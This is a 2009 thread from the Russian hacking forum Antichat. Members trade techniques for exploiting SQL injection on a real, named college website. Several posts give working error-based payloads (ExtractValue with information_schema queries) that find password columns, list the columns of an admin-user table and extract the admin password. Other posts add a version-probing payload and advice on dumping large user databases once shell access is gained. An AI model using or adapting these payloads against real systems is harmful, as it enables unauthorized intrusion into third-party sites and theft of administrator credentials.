Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.12.2009, 19:35
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому.
Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно.
Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи
Последний раз редактировалось jokester; 11.12.2009 в 19:39..
|
|
|
11.12.2009, 19:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 jokester:
Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше.
Блинда все-таки, а не очередной unhex(hex())
Последний раз редактировалось Pashkela; 11.12.2009 в 19:48..
|
|
|
|
11.12.2009, 19:55
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте.
...
Блинда все-таки, а не очередной unhex(hex())
Это не блайнд в том-то всё и дело, а не предложил...
Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят.
Ок. Предложение:
1
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_nam e,column_name)) from information_schema.columns+where+column_name+LIKE+ CHAR(37,112,97,115,37) limit 1)))--+
2
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(co lumn_name)+from+information_schema.columns+where+t able_name='adminuser'+limit+1)))--+
Внимание интрига! Составьте третий запрос сами!!!
|
|
|
|
11.12.2009, 20:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект  Нет бы сразу
Третий запрос наверное такой, извините мне мою наглость:
Код:
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select%20USR_Password%20from%20trccweb.adminuser%20limit%200,1)))--+
PS: Аплодирую стоя
Последний раз редактировалось Pashkela; 11.12.2009 в 20:09..
|
|
|
|
11.12.2009, 20:12
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+
гениально
пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
|
|
|
|
11.12.2009, 20:15
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1
ну и чем твой запрос отличается от моего в принципе? Перестановкой and or 1=1? Смешно
PS: А, понял, типо в твоем БОЛЕЕ очевидно, что 5-я ветка. Ну мейби, мейби, типо меньше глаза ломать. Но у меня зато не надо думать о кавычках и последовательности их закрытия, т.к. просто вызываем ошибку и дальше все стандартно (тут все-таки не диссер пишем, а наводим чела на хотя бы правильное решение. Ты еще шелл предложи ему залить просто так ) Вот джок молодец, я такого раньше и не слыхал.
Последний раз редактировалось Pashkela; 11.12.2009 в 20:28..
|
|
|
|
11.12.2009, 20:37
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Pashkela, ну да, статьи то читать это же только для крутых цветных дядек
|
|
|
|
11.12.2009, 20:41
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Да-да, вы все правы несомненно. Пойду читать. Ибо, как я понял, просто помочь уже не катит, надо подсказать максимально эффективно. Но радует такая придирчивость, честно. Так правдами и неправдами действительно хоть чему-то научиться можно.
PS: Только в бошку оно быстрее и надежнее влезает на живых примерах-то.
Последний раз редактировалось Pashkela; 11.12.2009 в 21:53..
|
|
|
|
12.12.2009, 17:28
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
|
|
|
|
12.12.2009, 18:41
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от jecka3000
Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
Доступ к шеллу есть? Если mysql бд, то mysql-dump
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
Похожие темы
Линейный вид
